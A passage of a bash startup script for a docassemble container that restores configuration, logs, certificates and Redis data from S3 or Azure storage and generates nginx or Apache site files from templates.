if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && redis-cli ping &> /dev/null; then
REDISRUNNING=true
else
REDISRUNNING=false
fi
echo "4" >&2
if [ -f /var/run/crond.pid ]; then
CRON_PID=$(</var/run/crond.pid)
if kill -0 $CRON_PID &> /dev/null; then
CRONRUNNING=true
else
rm -f /var/run/crond.pid
CRONRUNNING=false
fi
else
CRONRUNNING=false
fi
echo "5" >&2
if [ "${USEHTTPS:-false}" == "false" ] && [ "${BEHINDHTTPSLOADBALANCER:-false}" == "false" ]; then
URLROOT="http:\\/\\/"
else
URLROOT="https:\\/\\/"
fi
echo "6" >&2
if [ "${DAHOSTNAME:-none}" != "none" ]; then
URLROOT="${URLROOT}${DAHOSTNAME}"
else
if [ "${EC2:-false}" == "true" ]; then
PUBLIC_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/public-hostname`
else
PUBLIC_HOSTNAME=`hostname --fqdn`
fi
URLROOT="${URLROOT}${PUBLIC_HOSTNAME}"
fi
echo "7" >&2
if [ "${S3ENABLE:-null}" == "null" ] && [ "${S3BUCKET:-null}" != "null" ]; then
export S3ENABLE=true
fi
echo "8" >&2
if [ "${S3ENABLE:-null}" == "true" ] && [ "${S3BUCKET:-null}" != "null" ] && [ "${S3ACCESSKEY:-null}" != "null" ] && [ "${S3SECRETACCESSKEY:-null}" != "null" ]; then
export S3_ACCESS_KEY="$S3ACCESSKEY"
export S3_SECRET_KEY="$S3SECRETACCESSKEY"
export AWS_ACCESS_KEY_ID="$S3ACCESSKEY"
export AWS_SECRET_ACCESS_KEY="$S3SECRETACCESSKEY"
fi
if [ "${S3ENDPOINTURL:-null}" != "null" ]; then
export S4CMD_OPTS="--endpoint-url=\"${S3ENDPOINTURL}\""
fi
if [ "${S3ENABLE:-null}" == "true" ]; then
if [ "${USEMINIO:-false}" == "true" ]; then
python -m docassemble.webapp.createminio "${S3ENDPOINTURL}" "${S3ACCESSKEY}" "${S3SECRETACCESSKEY}" "${S3BUCKET}"
else
s4cmd mb "s3://${S3BUCKET}" &> /dev/null
fi
fi
echo "9" >&2
if [ "${AZUREENABLE:-null}" == "null" ] && [ "${AZUREACCOUNTNAME:-null}" != "null" ] && [ "${AZUREACCOUNTKEY:-null}" != "null" ] && [ "${AZURECONTAINER:-null}" != "null" ]; then
echo "Enable azure" >&2
export AZUREENABLE=true
fi
echo "10" >&2
if [ "${S3ENABLE:-false}" == "true" ] && [[ $CONTAINERROLE =~ .*:(web):.* ]] && [[ $(s4cmd ls s3://${S3BUCKET}/hostname-rabbitmq) ]] && [[ $(s4cmd ls s3://${S3BUCKET}/ip-rabbitmq) ]]; then
TEMPKEYFILE=`mktemp`
s4cmd -f get s3://${S3BUCKET}/hostname-rabbitmq $TEMPKEYFILE
HOSTNAMERABBITMQ=$(<$TEMPKEYFILE)
s4cmd -f get s3://${S3BUCKET}/ip-rabbitmq $TEMPKEYFILE
IPRABBITMQ=$(<$TEMPKEYFILE)
rm -f $TEMPKEYFILE
if [ -n "$(grep $HOSTNAMERABBITMQ /etc/hosts)" ]; then
sed -i "/$HOSTNAMERABBITMQ/d" /etc/hosts
fi
echo "$IPRABBITMQ $HOSTNAMERABBITMQ" >> /etc/hosts
fi
echo "11" >&2
if [ "${AZUREENABLE:-false}" == "true" ]; then
echo "Initializing azure" >&2
cmd_retry blob-cmd -f -v add-account "${AZUREACCOUNTNAME}" "${AZUREACCOUNTKEY}"
fi
echo "12" >&2
if [ "${AZUREENABLE:-false}" == "true" ] && [[ $CONTAINERROLE =~ .*:(web):.* ]] && [[ $(python -m docassemble.webapp.list-cloud hostname-rabbitmq) ]] && [[ $(python -m docassemble.webapp.list-cloud ip-rabbitmq) ]]; then
TEMPKEYFILE=`mktemp`
echo "Copying hostname-rabbitmq" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/hostname-rabbitmq" "${TEMPKEYFILE}"
HOSTNAMERABBITMQ=$(<$TEMPKEYFILE)
echo "Copying ip-rabbitmq" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/ip-rabbitmq" "${TEMPKEYFILE}"
IPRABBITMQ=$(<$TEMPKEYFILE)
rm -f "${TEMPKEYFILE}"
if [ -n "$(grep $HOSTNAMERABBITMQ /etc/hosts)" ]; then
sed -i "/$HOSTNAMERABBITMQ/d" /etc/hosts
fi
echo "$IPRABBITMQ $HOSTNAMERABBITMQ" >> /etc/hosts
fi
echo "13" >&2
if [ "${S3ENABLE:-false}" == "true" ]; then
if [ "${EC2:-false}" == "true" ]; then
export LOCAL_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/local-hostname`
else
export LOCAL_HOSTNAME=`hostname --fqdn`
fi
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [[ $(s4cmd ls "s3://${S3BUCKET}/letsencrypt.tar.gz") ]]; then
rm -f /tmp/letsencrypt.tar.gz
s4cmd get "s3://${S3BUCKET}/letsencrypt.tar.gz" /tmp/letsencrypt.tar.gz
cd /
tar -xf /tmp/letsencrypt.tar.gz
rm -f /tmp/letsencrypt.tar.gz
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ "${DABACKUPDAYS}" != "0" ] && [[ $(s4cmd ls "s3://${S3BUCKET}/backup/${LOCAL_HOSTNAME}") ]]; then
s4cmd dsync "s3://${S3BUCKET}/backup/${LOCAL_HOSTNAME}" "${DA_ROOT}/backup"
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [[ $(s4cmd ls "s3://${S3BUCKET}/apache") ]]; then
s4cmd dsync "s3://${S3BUCKET}/apache" /etc/apache2/sites-available
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [[ $(s4cmd ls "s3://${S3BUCKET}/apachelogs") ]]; then
s4cmd dsync "s3://${S3BUCKET}/apachelogs" /var/log/apache2
chown root.adm /var/log/apache2/*
chmod 640 /var/log/apache2/*
fi
if [[ $(s4cmd ls "s3://${S3BUCKET}/nginxlogs") ]]; then
s4cmd dsync "s3://${S3BUCKET}/nginxlogs" /var/log/nginx
chown www-data.adm /var/log/nginx/*
chmod 640 /var/log/nginx/*
fi
fi
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]] && [[ $(s4cmd ls "s3://${S3BUCKET}/log") ]]; then
s4cmd dsync "s3://${S3BUCKET}/log" "${LOGDIRECTORY:-${DA_ROOT}/log}"
chown -R www-data.www-data "${LOGDIRECTORY:-${DA_ROOT}/log}"
fi
if [[ $(s4cmd ls "s3://${S3BUCKET}/config.yml") ]]; then
rm -f "$DA_CONFIG_FILE"
s4cmd get "s3://${S3BUCKET}/config.yml" "$DA_CONFIG_FILE"
chown www-data.www-data "$DA_CONFIG_FILE"
fi
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && [[ $(s4cmd ls "s3://${S3BUCKET}/redis.rdb") ]] && [ "$REDISRUNNING" = false ]; then
s4cmd -f get "s3://${S3BUCKET}/redis.rdb" "/var/lib/redis/dump.rdb"
chown redis.redis "/var/lib/redis/dump.rdb"
fi
elif [ "${AZUREENABLE:-false}" == "true" ]; then
if [ "${EC2:-false}" == "true" ]; then
export LOCAL_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/local-hostname`
else
export LOCAL_HOSTNAME=`hostname --fqdn`
fi
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [[ $(python -m docassemble.webapp.list-cloud letsencrypt.tar.gz) ]]; then
rm -f /tmp/letsencrypt.tar.gz
echo "Copying let's encrypt" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/letsencrypt.tar.gz" "/tmp/letsencrypt.tar.gz"
cd /
tar -xf /tmp/letsencrypt.tar.gz
rm -f /tmp/letsencrypt.tar.gz
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ "${DABACKUPDAYS}" != "0" ] && [[ $(python -m docassemble.webapp.list-cloud backup/${LOCAL_HOSTNAME}/) ]]; then
BACKUPDIR="backup/${LOCAL_HOSTNAME}/"
let BACKUPDIRLENGTH=${#BACKUPDIR}+1
for the_file in $(python -m docassemble.webapp.list-cloud $BACKUPDIR | cut -c ${BACKUPDIRLENGTH}-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
if [ ! -f "${DA_ROOT}/backup/${the_file}" ]; then
echo "Copying backup file" $the_file >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/backup/${LOCAL_HOSTNAME}/${the_file}" "${DA_ROOT}/backup/${the_file}"
fi
fi
done
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [[ $(python -m docassemble.webapp.list-cloud apache/) ]]; then
echo "There are apache files on Azure" >&2
for the_file in $(python -m docassemble.webapp.list-cloud apache/ | cut -c 8-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
echo "Copying apache file" $the_file >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/apache/${the_file}" "/etc/apache2/sites-available/${the_file}"
fi
done
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [[ $(python -m docassemble.webapp.list-cloud apachelogs/) ]]; then
echo "There are apache log files on Azure" >&2
for the_file in $(python -m docassemble.webapp.list-cloud apachelogs/ | cut -c 12-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
echo "Copying log file $the_file" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/apachelogs/${the_file}" "/var/log/apache2/${the_file}"
fi
done
chown root.adm /var/log/apache2/*
chmod 640 /var/log/apache2/*
fi
if [[ $(python -m docassemble.webapp.list-cloud nginxlogs/) ]]; then
echo "There are nginx log files on Azure" >&2
for the_file in $(python -m docassemble.webapp.list-cloud nginxlogs/ | cut -c 11-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
echo "Copying log file $the_file" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/nginxlogs/${the_file}" "/var/log/nginx/${the_file}"
fi
done
chown www-data.adm /var/log/nginx/*
chmod 640 /var/log/nginx/*
fi
fi
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]] && [[ $(python -m docassemble.webapp.list-cloud log) ]]; then
echo "There are log files on Azure" >&2
for the_file in $(python -m docassemble.webapp.list-cloud log/ | cut -c 5-); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
echo "Copying log file $the_file" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/log/${the_file}" "${LOGDIRECTORY:-${DA_ROOT}/log}/${the_file}"
fi
done
chown -R www-data.www-data "${LOGDIRECTORY:-${DA_ROOT}/log}"
fi
if [[ $(python -m docassemble.webapp.list-cloud config.yml) ]]; then
rm -f "$DA_CONFIG_FILE"
echo "Copying config.yml" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/config.yml" "${DA_CONFIG_FILE}"
chown www-data.www-data "${DA_CONFIG_FILE}"
ls -l "${DA_CONFIG_FILE}" >&2
fi
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && [[ $(python -m docassemble.webapp.list-cloud redis.rdb) ]] && [ "$REDISRUNNING" = false ]; then
echo "Copying redis" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/redis.rdb" "/var/lib/redis/dump.rdb"
chown redis.redis "/var/lib/redis/dump.rdb"
fi
else
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [ -f "${DA_ROOT}/backup/letsencrypt.tar.gz" ]; then
cd /
tar -xf "${DA_ROOT}/backup/letsencrypt.tar.gz"
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [ -d "${DA_ROOT}/backup/apache" ]; then
rsync -auq "${DA_ROOT}/backup/apache/" /etc/apache2/sites-available/
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]] && [ -d "${DA_ROOT}/backup/apachelogs" ]; then
rsync -auq "${DA_ROOT}/backup/apachelogs/" /var/log/apache2/
chown root.adm /var/log/apache2/*
chmod 640 /var/log/apache2/*
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]] && [ -d "${DA_ROOT}/backup/nginxlogs" ]; then
rsync -auq "${DA_ROOT}/backup/nginxlogs/" /var/log/nginx/
chown www-data.adm /var/log/nginx/*
chmod 640 /var/log/nginx/*
fi
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]] && [ -d "${DA_ROOT}/backup/log" ]; then
rsync -auq "${DA_ROOT}/backup/log/" "${LOGDIRECTORY:-${DA_ROOT}/log}/"
chown -R www-data.www-data "${LOGDIRECTORY:-${DA_ROOT}/log}"
fi
if [ -f "${DA_ROOT}/backup/config.yml" ]; then
cp "${DA_ROOT}/backup/config.yml" "${DA_CONFIG_FILE}"
chown www-data.www-data "${DA_CONFIG_FILE}"
fi
if [ -d "${DA_ROOT}/backup/files" ]; then
rsync -auq "${DA_ROOT}/backup/files" "${DA_ROOT}/"
chown -R www-data.www-data "${DA_ROOT}/files"
fi
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && [ -f "${DA_ROOT}/backup/redis.rdb" ] && [ "$REDISRUNNING" = false ]; then
cp "${DA_ROOT}/backup/redis.rdb" /var/lib/redis/dump.rdb
chown redis.redis "/var/lib/redis/dump.rdb"
fi
fi
echo "14" >&2
DEFAULT_SECRET=$(python -m docassemble.base.generate_key)
echo "15" >&2
if [ "${BEHINDHTTPSLOADBALANCER:-null}" == "true" ] && [ "${XSENDFILE:-null}" == "null" ]; then
export XSENDFILE=false
fi
if [ ! -f "$DA_CONFIG_FILE" ]; then
echo "There is no config file. Creating one from source." >&2
sed -e 's@{{DBPREFIX}}@'"${DBPREFIX:-postgresql+psycopg2:\/\/}"'@' \
-e 's/{{DBNAME}}/'"${DBNAME:-docassemble}"'/' \
-e 's/{{DBUSER}}/'"${DBUSER:-docassemble}"'/' \
-e 's#{{DBPASSWORD}}#'"${DBPASSWORD:-abc123}"'#' \
-e 's/{{DBHOST}}/'"${DBHOST:-null}"'/' \
-e 's/{{DBPORT}}/'"${DBPORT:-null}"'/' \
-e 's/{{DBTABLEPREFIX}}/'"${DBTABLEPREFIX:-null}"'/' \
-e 's/{{DBBACKUP}}/'"${DBBACKUP:-true}"'/' \
-e 's/{{S3ENABLE}}/'"${S3ENABLE:-false}"'/' \
-e 's#{{S3ACCESSKEY}}#'"${S3ACCESSKEY:-null}"'#' \
-e 's#{{S3SECRETACCESSKEY}}#'"${S3SECRETACCESSKEY:-null}"'#' \
-e 's@{{S3ENDPOINTURL}}@'"${S3ENDPOINTURL:-null}"'@' \
-e 's/{{S3BUCKET}}/'"${S3BUCKET:-null}"'/' \
-e 's/{{S3REGION}}/'"${S3REGION:-null}"'/' \
-e 's/{{AZUREENABLE}}/'"${AZUREENABLE:-false}"'/' \
-e 's/{{AZUREACCOUNTNAME}}/'"${AZUREACCOUNTNAME:-null}"'/' \
-e 's@{{AZUREACCOUNTKEY}}@'"${AZUREACCOUNTKEY:-null}"'@' \
-e 's/{{AZURECONTAINER}}/'"${AZURECONTAINER:-null}"'/' \
-e 's/{{DABACKUPDAYS}}/'"${DABACKUPDAYS:-14}"'/' \
-e 's@{{REDIS}}@'"${REDIS:-null}"'@' \
-e 's#{{RABBITMQ}}#'"${RABBITMQ:-null}"'#' \
-e 's@{{TIMEZONE}}@'"${TIMEZONE:-null}"'@' \
-e 's/{{EC2}}/'"${EC2:-false}"'/' \
-e 's/{{COLLECTSTATISTICS}}/'"${COLLECTSTATISTICS:-false}"'/' \
-e 's/{{KUBERNETES}}/'"${KUBERNETES:-false}"'/' \
-e 's/{{USECLOUDURLS}}/'"${USECLOUDURLS:-false}"'/' \
-e 's/{{USEMINIO}}/'"${USEMINIO:-false}"'/' \
-e 's/{{USEHTTPS}}/'"${USEHTTPS:-false}"'/' \
-e 's/{{USELETSENCRYPT}}/'"${USELETSENCRYPT:-false}"'/' \
-e 's/{{LETSENCRYPTEMAIL}}/'"${LETSENCRYPTEMAIL:-null}"'/' \
-e 's@{{LOGSERVER}}@'"${LOGSERVER:-null}"'@' \
-e 's/{{DAHOSTNAME}}/'"${DAHOSTNAME:-none}"'/' \
-e 's/{{LOCALE}}/'"${LOCALE:-null}"'/' \
-e 's/{{SERVERADMIN}}/'"${SERVERADMIN:-webmaster@localhost}"'/' \
-e 's@{{DASECRETKEY}}@'"${DEFAULT_SECRET}"'@' \
-e 's@{{URLROOT}}@'"${URLROOT:-null}"'@' \
-e 's@{{POSTURLROOT}}@'"${POSTURLROOT:-/}"'@' \
-e 's/{{BEHINDHTTPSLOADBALANCER}}/'"${BEHINDHTTPSLOADBALANCER:-false}"'/' \
-e 's/{{XSENDFILE}}/'"${XSENDFILE:-true}"'/' \
-e 's/{{DAEXPOSEWEBSOCKETS}}/'"${DAEXPOSEWEBSOCKETS:-false}"'/' \
-e 's/{{DAWEBSOCKETSIP}}/'"${DAWEBSOCKETSIP:-null}"'/' \
-e 's/{{DAWEBSOCKETSPORT}}/'"${DAWEBSOCKETSPORT:-null}"'/' \
-e 's/{{DAUPDATEONSTART}}/'"${DAUPDATEONSTART:-true}"'/' \
-e 's/{{DAALLOWUPDATES}}/'"${DAALLOWUPDATES:-true}"'/' \
-e 's/{{DAWEBSERVER}}/'"${DAWEBSERVER:-nginx}"'/' \
-e 's/{{DASTABLEVERSION}}/'"${DASTABLEVERSION:-false}"'/' \
-e 's/{{DASQLPING}}/'"${DASQLPING:-false}"'/' \
"$DA_CONFIG_FILE_DIST" > "$DA_CONFIG_FILE" || exit 1
fi
chown www-data.www-data "$DA_CONFIG_FILE"
echo "16" >&2
source /dev/stdin < <(su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.base.read_config \"${DA_CONFIG_FILE}\"" www-data)
export LOGDIRECTORY="${LOGDIRECTORY:-${DA_ROOT}/log}"
echo "16.1" >&2
python -m docassemble.webapp.starthook "${DA_CONFIG_FILE}"
echo "16.5" >&2
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
sed -e 's@{{DA_PYTHON}}@'"${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}"'@' \
-e 's@{{DAWSGIROOT}}@'"${WSGIROOT}"'@' \
-e 's@{{DA_ROOT}}@'"${DA_ROOT}"'@' \
"${DA_ROOT}/config/docassemble.ini.dist" > "${DA_ROOT}/config/docassemble.ini"
sed -e 's@{{DA_PYTHON}}@'"${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}"'@' \
-e 's@{{DA_ROOT}}@'"${DA_ROOT}"'@' \
"${DA_ROOT}/config/docassemblelog.ini.dist" > "${DA_ROOT}/config/docassemblelog.ini"
mkdir -p /var/run/uwsgi
chown www-data.www-data /var/run/uwsgi
fi
echo "17" >&2
if [ "${S3ENABLE:-false}" == "true" ] && [[ ! $(s4cmd ls "s3://${S3BUCKET}/config.yml") ]]; then
s4cmd -f put "${DA_CONFIG_FILE}" "s3://${S3BUCKET}/config.yml"
fi
if [ "${S3ENABLE:-false}" == "true" ] && [[ ! $(s4cmd ls "s3://${S3BUCKET}/files") ]]; then
if [ -d "${DA_ROOT}/files" ]; then
for the_file in $(ls "${DA_ROOT}/files"); do
if [[ $the_file =~ ^[0-9]+ ]]; then
for sub_file in $(find "${DA_ROOT}/files/$the_file" -type f); do
file_number="${sub_file#${DA_ROOT}/files/}"
file_number="${file_number:0:15}"
file_directory="${DA_ROOT}/files/$file_number"
target_file="${sub_file#${file_directory}}"
file_number="${file_number//\//}"
file_number=$((16#$file_number))
s4cmd -f put "${sub_file}" "s3://${S3BUCKET}/files/${file_number}/${target_file}"
done
else
s4cmd dsync "${DA_ROOT}/files/${the_file}" "s3://${S3BUCKET}/${the_file}"
fi
done
fi
fi
echo "18" >&2
if [ "${AZUREENABLE:-false}" == "true" ]; then
echo "Initializing azure" >&2
cmd_retry blob-cmd -f -v add-account "${AZUREACCOUNTNAME}" "${AZUREACCOUNTKEY}"
fi
echo "19" >&2
if [ "${AZUREENABLE:-false}" == "true" ] && [[ ! $(python -m docassemble.webapp.list-cloud config.yml) ]]; then
echo "Saving config" >&2
cmd_retry blob-cmd -f cp "${DA_CONFIG_FILE}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/config.yml"
fi
echo "19.5" >&2
if [ "${AZUREENABLE:-false}" == "true" ] && [[ ! $(python -m docassemble.webapp.list-cloud files) ]]; then
if [ -d "${DA_ROOT}/files" ]; then
for the_file in $(ls "${DA_ROOT}/files"); do
if [[ $the_file =~ ^[0-9]+ ]]; then
for sub_file in $(find "${DA_ROOT}/files/$the_file" -type f); do
file_number="${sub_file#${DA_ROOT}/files/}"
file_number="${file_number:0:15}"
file_directory="${DA_ROOT}/files/$file_number/"
target_file="${sub_file#${file_directory}}"
file_number="${file_number//\//}"
file_number=$((16#$file_number))
cmd_retry blob-cmd -f cp "${sub_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/files/${file_number}/${target_file}"
done
else
for sub_file in $(find "${DA_ROOT}/files/$the_file" -type f); do
target_file="${sub_file#${DA_ROOT}/files/}"
cmd_retry blob-cmd -f cp "${sub_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/${target_file}"
done
fi
done
fi
fi
echo "20" >&2
if [ "${EC2:-false}" == "true" ]; then
export LOCAL_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/local-hostname`
export PUBLIC_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/public-hostname`
else
export LOCAL_HOSTNAME=`hostname --fqdn`
export PUBLIC_HOSTNAME="${LOCAL_HOSTNAME}"
fi
echo "21" >&2
if [ "${DAHOSTNAME:-none}" == "none" ]; then
export DAHOSTNAME="${PUBLIC_HOSTNAME}"
fi
echo "22" >&2
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]]; then
a2dissite -q 000-default &> /dev/null
a2dissite -q default-ssl &> /dev/null
rm -f /etc/apache2/sites-available/000-default.conf
rm -f /etc/apache2/sites-available/default-ssl.conf
if [ "${DAHOSTNAME:-none}" != "none" ]; then
if [ ! -f "/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem" ]; then
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/apache2/sites-available/docassemble-ssl.conf ]; then
cp "${DA_ROOT}/config/docassemble-ssl.conf.dist" /etc/apache2/sites-available/docassemble-ssl.conf
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/apache2/sites-available/docassemble-http.conf ]; then
cp "${DA_ROOT}/config/docassemble-http.conf.dist" /etc/apache2/sites-available/docassemble-http.conf
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/apache2/sites-available/docassemble-log.conf ]; then
cp "${DA_ROOT}/config/docassemble-log.conf.dist" /etc/apache2/sites-available/docassemble-log.conf
fi
if [ ! -f /etc/apache2/sites-available/docassemble-redirect.conf ]; then
cp "${DA_ROOT}/config/docassemble-redirect.conf.dist" /etc/apache2/sites-available/docassemble-redirect.conf
fi
else
if [ ! -f /etc/apache2/sites-available/docassemble-http.conf ]; then
cp "${DA_ROOT}/config/docassemble-http.conf.dist" /etc/apache2/sites-available/docassemble-http.conf || exit 1
fi
fi
a2ensite docassemble-http
fi
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ] && [ -f "/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem" ]; then
DASSLCERTIFICATE="/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem; # managed by Certbot"
DASSLCERTIFICATEKEY="/etc/letsencrypt/live/${DAHOSTNAME}/privkey.pem; # managed by Certbot"
else
DASSLCERTIFICATE="/etc/ssl/docassemble/nginx.crt;"
DASSLCERTIFICATEKEY="/etc/ssl/docassemble/nginx.key;"
fi
DASSLPROTOCOLS=${DASSLPROTOCOLS:-TLSv1.2}
if [ ! -f "/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem" ]; then
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ "${BEHINDHTTPSLOADBALANCER:-false}" == "true" ]; then
DAREALIP="include ${DA_ROOT}/config/nginx-realip;"
ln -sf /etc/nginx/sites-available/docassembleredirect /etc/nginx/sites-enabled/docassembleredirect
else
DAREALIP=""
rm -f /etc/nginx/sites-enabled/docassembleredirect
fi
if [ "${POSTURLROOT}" == "/" ]; then
DALOCATIONREWRITE=" "
else
DALOCATIONREWRITE="location = ${WSGIROOT} { rewrite ^ ${POSTURLROOT}; }"
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]]; then
rm -f /etc/nginx/sites-available/default
rm -f /etc/nginx/sites-enabled/default
if [ "${DAHOSTNAME:-none}" != "none" ]; then
if [ ! -f /etc/nginx/sites-available/docassemblessl ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
-e 's@{{DALOCATIONREWRITE}}@'"${DALOCATIONREWRITE}"'@' \
-e 's@{{DAWSGIROOT}}@'"${WSGIROOT}"'@' \
-e 's@{{DAPOSTURLROOT}}@'"${POSTURLROOT}"'@' \
-e 's@{{DAREALIP}}@'"${DAREALIP}"'@' \
-e 's@{{DAMAXCONTENTLENGTH}}@'"${DAMAXCONTENTLENGTH}"'@' \
-e 's@{{DASSLCERTIFICATE}}@'"${DASSLCERTIFICATE}"'@' \
-e 's@{{DASSLCERTIFICATEKEY}}@'"${DASSLCERTIFICATEKEY}"'@' \
-e 's@{{DASSLPROTOCOLS}}@'"${DASSLPROTOCOLS}"'@' \
-e 's@{{DAWEBSOCKETSIP}}@'"${DAWEBSOCKETSIP:-127.0.0.1}"'@' \
-e 's@{{DAWEBSOCKETSPORT}}@'"${DAWEBSOCKETSPORT:-5000}"'@' \
"${DA_ROOT}/config/nginx-ssl.dist" > "/etc/nginx/sites-available/docassemblessl"
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/nginx/sites-available/docassemblehttp ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
-e 's@{{DALOCATIONREWRITE}}@'"${DALOCATIONREWRITE}"'@' \
-e 's@{{DAWSGIROOT}}@'"${WSGIROOT}"'@' \
-e 's@{{DAPOSTURLROOT}}@'"${POSTURLROOT}"'@' \
-e 's@{{DAREALIP}}@'"${DAREALIP}"'@' \
-e 's@{{DAMAXCONTENTLENGTH}}@'"${DAMAXCONTENTLENGTH}"'@' \
-e 's@{{DAWEBSOCKETSIP}}@'"${DAWEBSOCKETSIP:-127.0.0.1}"'@' \
-e 's@{{DAWEBSOCKETSPORT}}@'"${DAWEBSOCKETSPORT:-5000}"'@' \
"${DA_ROOT}/config/nginx-http.dist" > "/etc/nginx/sites-available/docassemblehttp"
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
if [ ! -f /etc/nginx/sites-available/docassemblelog ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
-e 's@{{DAMAXCONTENTLENGTH}}@'"${DAMAXCONTENTLENGTH}"'@' \
"${DA_ROOT}/config/nginx-log.dist" > "/etc/nginx/sites-available/docassemblelog"
fi
if [ ! -f /etc/nginx/sites-available/docassembleredirect ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
"${DA_ROOT}/config/nginx-redirect.dist" > "/etc/nginx/sites-available/docassembleredirect"
fi
if [ ! -f /etc/nginx/sites-available/docassemblesslredirect ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
"${DA_ROOT}/config/nginx-ssl-redirect.dist" > "/etc/nginx/sites-available/docassemblesslredirect"
fi
else
if [ ! -f /etc/nginx/sites-available/docassemblehttp ]; then
sed -e 's@{{DAHOSTNAME}}@'"${DAHOSTNAME:-localhost}"'@' \
-e 's@{{DALOCATIONREWRITE}}@'"${DALOCATIONREWRITE}"'@' \
-e 's@{{DAWSGIROOT}}@'"${WSGIROOT}"'@' \
-e 's@{{DAPOSTURLROOT}}@'"${POSTURLROOT}"'@' \
-e 's@{{DAREALIP}}@'"${DAREALIP}"'@' \
-e 's@{{DAMAXCONTENTLENGTH}}@'"${DAMAXCONTENTLENGTH}"'@' \
-e 's@{{DAWEBSOCKETSIP}}@'"${DAWEBSOCKETSIP:-127.0.0.1}"'@' \
-e 's@{{DAWEBSOCKETSPORT}}@'"${DAWEBSOCKETSPORT:-5000}"'@' \
"${DA_ROOT}/config/nginx-http.dist" > "/etc/nginx/sites-available/docassemblehttp"
fi
fi
fi
fi
echo "23" >&2
if [ "${LOCALE:-undefined}" == "undefined" ]; then
LOCALE="en_US.UTF-8 UTF-8"
fi
echo "24" >&2
set -- $LOCALE
DA_LANGUAGE=$1
export LANG=$1
grep -q "^$LOCALE" /etc/locale.gen || { echo $LOCALE >> /etc/locale.gen && locale-gen ; }
update-locale LANG="${DA_LANGUAGE}"
echo "25" >&2
if [ -n "$OTHERLOCALES" ]; then
NEWLOCALE=false
for LOCALETOSET in "${OTHERLOCALES[@]}"; do
